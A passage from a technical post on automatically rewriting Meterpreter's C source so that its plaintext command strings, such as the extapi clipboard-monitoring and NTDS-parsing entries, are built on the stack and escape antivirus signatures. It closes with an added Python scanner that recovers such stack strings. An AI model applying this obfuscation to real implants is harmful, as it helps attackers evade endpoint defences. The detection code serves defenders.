Automatically Refactoring Meterpreter to Bypass Antivirus (Part 2)
Behind the scenes, the first snippet stores the string ntdll in the .rdata section of the generated binary, where an antivirus engine can find it trivially. In the second snippet the string is assembled on the stack at run time and is, in the general case, statically indistinguishable from code. IDA Pro or comparable tools can usually still recover such strings, but only by running a more advanced and far more computationally expensive analysis of the binary.
List initializers. In Meterpreter's code base this construct appears in several files, for example in c/meterpreter/source/extensions/extapi/extapi.c:
Command customCommands[] =
{
	COMMAND_REQ("extapi_window_enum", request_window_enum),
	COMMAND_REQ("extapi_service_enum", request_service_enum),
	COMMAND_REQ("extapi_service_query", request_service_query),
	COMMAND_REQ("extapi_service_control", request_service_control),
	COMMAND_REQ("extapi_clipboard_get_data", request_clipboard_get_data),
	COMMAND_REQ("extapi_clipboard_set_data", request_clipboard_set_data),
	COMMAND_REQ("extapi_clipboard_monitor_start", request_clipboard_monitor_start),
	COMMAND_REQ("extapi_clipboard_monitor_pause", request_clipboard_monitor_pause),
	COMMAND_REQ("extapi_clipboard_monitor_resume", request_clipboard_monitor_resume),
	COMMAND_REQ("extapi_clipboard_monitor_purge", request_clipboard_monitor_purge),
	COMMAND_REQ("extapi_clipboard_monitor_stop", request_clipboard_monitor_stop),
	COMMAND_REQ("extapi_clipboard_monitor_dump", request_clipboard_monitor_dump),
	COMMAND_REQ("extapi_adsi_domain_query", request_adsi_domain_query),
	COMMAND_REQ("extapi_ntds_parse", ntds_parse),
	COMMAND_REQ("extapi_wmi_query", request_wmi_query),
	COMMAND_REQ("extapi_pageant_send_query", request_pageant_send_query),
	...
}
These strings are stored in plaintext in the .rdata section of ext_server_espia.x64.dll and are flagged by ESET Nod32.
Worse, these strings are arguments to macros that sit inside a list initializer. That introduces a number of tricky cases, but they need not concern us here. Our goal is to rewrite this fragment automatically into the following form:
char hid_extapi_UQOoNXigAPq4[] = {'e','x','t','a','p','i','_','w','i','n','d','o','w','_','e','n','u','m',0};
char hid_extapi_vhFHmZ8u2hfz[] = {'e','x','t','a','p','i','_','s','e','r','v','i','c','e','_','e','n','u','m',0};
char hid_extapi_pW25eeIGBeru[] = {'e','x','t','a','p','i','_','s','e','r','v','i','c','e','_','q','u','e','r','y',0};
char hid_extapi_S4Ws57MYBjib[] = {'e','x','t','a','p','i','_','s','e','r','v','i','c','e','_','c','o','n','t','r','o','l',0};
char hid_extapi_HJ0lD9Dl56A4[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','g','e','t','_','d','a','t','a',0};
char hid_extapi_IiEzXils3UsR[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','s','e','t','_','d','a','t','a',0};
char hid_extapi_czLOBo0HcqCP[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n','i','t','o','r','_','s','t','a','r','t',0};
char hid_extapi_WcWbTrsQujiT[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n','i','t','o','r','_','p','a','u','s','e',0};
char hid_extapi_rPiFTZW4ShwA[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n','i','t','o','r','_','r','e','s','u','m','e',0};
char hid_extapi_05fAoaZLqOoy[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n','i','t','o','r','_','p','u','r','g','e',0};
char hid_extapi_cOOyHTPTvZGK[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n','i','t','o','r','_','s','t','o','p',0};
char hid_extapi_smtmvW05cI9y[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n','i','t','o','r','_','d','u','m','p',0};
char hid_extapi_01kuYCM8z49k[] = {'e','x','t','a','p','i','_','a','d','s','i','_','d','o','m','a','i','n','_','q','u','e','r','y',0};
char hid_extapi_SMK9uFj6nThk[] = {'e','x','t','a','p','i','_','n','t','d','s','_','p','a','r','s','e',0};
char hid_extapi_PHxnGM7M0609[] = {'e','x','t','a','p','i','_','w','m','i','_','q','u','e','r','y',0};
char hid_extapi_J7EGS6FRHwkV[] = {'e','x','t','a','p','i','_','p','a','g','e','a','n','t','_','s','e','n','d','_','q','u','e','r','y',0};
Command customCommands[] =
{
	COMMAND_REQ(hid_extapi_UQOoNXigAPq4, request_window_enum),
	COMMAND_REQ(hid_extapi_vhFHmZ8u2hfz, request_service_enum),
	COMMAND_REQ(hid_extapi_pW25eeIGBeru, request_service_query),
	COMMAND_REQ(hid_extapi_S4Ws57MYBjib, request_service_control),
	COMMAND_REQ(hid_extapi_HJ0lD9Dl56A4, request_clipboard_get_data),
	COMMAND_REQ(hid_extapi_IiEzXils3UsR, request_clipboard_set_data),
	COMMAND_REQ(hid_extapi_czLOBo0HcqCP, request_clipboard_monitor_start),
	COMMAND_REQ(hid_extapi_WcWbTrsQujiT, request_clipboard_monitor_pause),
	COMMAND_REQ(hid_extapi_rPiFTZW4ShwA, request_clipboard_monitor_resume),
	COMMAND_REQ(hid_extapi_05fAoaZLqOoy, request_clipboard_monitor_purge),
	COMMAND_REQ(hid_extapi_cOOyHTPTvZGK, request_clipboard_monitor_stop),
	COMMAND_REQ(hid_extapi_smtmvW05cI9y, request_clipboard_monitor_dump),
	COMMAND_REQ(hid_extapi_01kuYCM8z49k, request_adsi_domain_query),
	COMMAND_REQ(hid_extapi_SMK9uFj6nThk, ntds_parse),
	COMMAND_REQ(hid_extapi_PHxnGM7M0609, request_wmi_query),
	COMMAND_REQ(hid_extapi_J7EGS6FRHwkV, request_pageant_send_query),
	COMMAND_TERMINATOR
};
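As an added illustration of the detection side, and not code from the original post or from the Meterpreter project, this Python scanner recovers strings that were moved from .rdata onto the stack by decoding the byte-sized stack stores a compiler emits for such char arrays. The two instruction encodings it understands and the sample bytes it scans are constructed here; an optimising compiler may merge the stores into wider moves, which this decoder does not handle.

```python
import struct

def _s8(b: int) -> int:
    """One byte as a signed 8-bit displacement."""
    return struct.unpack("b", bytes([b]))[0]

def decode_byte_store(code: bytes, i: int):
    """Decode a byte-sized store to a stack slot at offset i -> (len, base, disp8, imm8) or None.
    Handles C6 45 <disp8> <imm8> (mov byte ptr [rbp+disp8], imm8)
    and C6 44 24 <disp8> <imm8> (mov byte ptr [rsp+disp8], imm8)."""
    if code[i:i + 1] != b"\xC6":
        return None
    if code[i + 1:i + 2] == b"\x45" and len(code) >= i + 4:
        return 4, "rbp", _s8(code[i + 2]), code[i + 3]
    if code[i + 1:i + 3] == b"\x44\x24" and len(code) >= i + 5:
        return 5, "rsp", _s8(code[i + 3]), code[i + 4]
    return None

def recover_stack_strings(code: bytes, min_len: int = 4):
    """Linear scan; a run of byte stores to consecutive slots becomes a candidate string.
    Returns a list of (code_offset, base, first_disp, text)."""
    found, run, i = [], [], 0
    def flush():
        text = bytes(t[3] for t in run).rstrip(b"\x00")
        if run and len(text) >= min_len and all(0x20 <= c < 0x7F for c in text):
            found.append((run[0][0], run[0][1], run[0][2], text.decode("ascii")))
        run.clear()

    while i < len(code):
        hit = decode_byte_store(code, i)
        if hit is None:          # not a stack store: any pending run ends here
            flush()
            i += 1
            continue
        n, base, disp, val = hit
        if run and (base != run[-1][1] or disp != run[-1][2] + 1):
            flush()              # different frame register, or a gap between slots
        run.append((i, base, disp, val))
        i += n
    flush()
    return found

def stack_string_stub(s: bytes, disp: int = 0x20, base: str = "rsp") -> bytes:
    """Constructed sample input: the byte stores an unoptimised compiler emits for
    char s[] = {'n','t','d','l','l',0}; (the NUL is appended here)."""
    out = bytearray()
    for k, ch in enumerate(s + b"\x00"):
        out += (b"\xC6\x45" if base == "rbp" else b"\xC6\x44\x24") + bytes([(disp + k) & 0xFF, ch])
    return bytes(out)
```

A plain .rdata reference such as lea rcx, [rip+disp32] produces no hit at all, which is exactly why the original string-table form is the easier one for a scanner to cover with a simple strings pass instead.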